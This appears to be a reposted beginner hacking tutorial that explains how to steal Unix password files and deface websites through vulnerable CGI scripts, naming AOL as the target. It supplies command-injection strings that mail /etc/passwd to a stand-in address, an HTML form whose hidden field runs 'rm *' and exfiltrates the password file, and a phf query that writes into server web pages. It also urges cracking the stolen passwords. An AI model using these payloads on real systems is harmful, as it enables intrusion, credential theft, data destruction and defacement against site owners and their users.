Browser Hack
I -
Introduction
This file will describe
several techiniques to aquire a password file just by using an ordinary web
browser, the information provided will be best described for the beginner
hacker, but all hackers should benifit from this information
II - Hacking
from your Web Browser
There are several
techniques on what i call "Web Browser Hacking", many beginners dont
know that you cant query a etc/passwd file from your browser and i will
describe all the ways to aquire a passwd file, first you need to find a box
that is running the cgi-bin/phf file on their system, a great way to find out
without trial and error is to go to www.altavista.com and just search on
cgi-bin and perl.exe or cgi-bin and phf
a - Finger box
hacking:
Lets say you wanted to
break into somewhere like AOL, the first thing we would do is type in their web
site in the URL: http://www.aol.com, the next thing we would do is add
/cgi-bin/finger to the web URL so it would look like this
http://www.aol.com/cgi-bin/finger, if the finger gateway is operational a box
should appear for you to enter the name you want to finger, if it is operational you have a chance to
receive the etc/passwd file, next thing you will probably want to do is search
for a mailto on the web page, just scan the page for any mailto refs, go back
to the finger box and type in this query, nobody@nowhere.org ; /bin/mail
me@junk.org < etc/passwd, this string takes nobody and emails the passwd
file to your email
address, if this works
you now have the etc/passwd file in your mailbox, you can now run a crack
program against it and have a little fun on their box
b - The common
cgi-bin/phf query:
c - Dont take
my cgi form:
<html><body>
<h2>This is a form
to go to Modify</h2>
<form action =
"http://www.aol.com/cgi-bin/doc.pl"
method="get">
<input
type="hidden" name="myaddress"
value="nobody@aol.com">
<input
type="text" name="input">
<input
type="submit" value="send">
</form>
</body></html>
This is a simple form
that asks a user to input a message to be sent to a script called doc.pl, included in the doc.pl script is the
following line which is assuming the line has already been parsed out
system("/usr/lib/sendmail
-t $myaddress < $tempfile")
Now lets set up your
page:
<html><body>
<h2>Hack
AOL</h2>
<form action =
"http://www.aol.com/cgi-bin/doc.pl" method = "get">
<input
type="hidden"
name="myaddress"
value=" ; rm * ;mail
-s file youraddress@yourisp.com </etc/passwd;">
<input type =
"text" name="input">
<input type =
"submit" value=:"getpasswd">
</form>
The semicolons in the
hidden value field act as delimiters, they separate the UNIX commands, this
executes commands on the same line, the system call in PERL and creates a UNIX
shell, and in here mails the passwd file to you.
d - Changing
web pages from your browser:
This short section will
describe the string to use to edit a web page from your web browser, same scenario as the first section,
http://www.aol.com, we will then add the following string
cgi-bin/phf?Qalias=x%0a/bin/echo%20 "some text and
shit"%20>>filename.html, this string will allow you to write to the
filename.html and add "some text and shit" be noted it has to be in
html format, you can place text, pictures or whatever you like
Email
hackerblackbox@gmail.com
0 Comments
thanks for your supports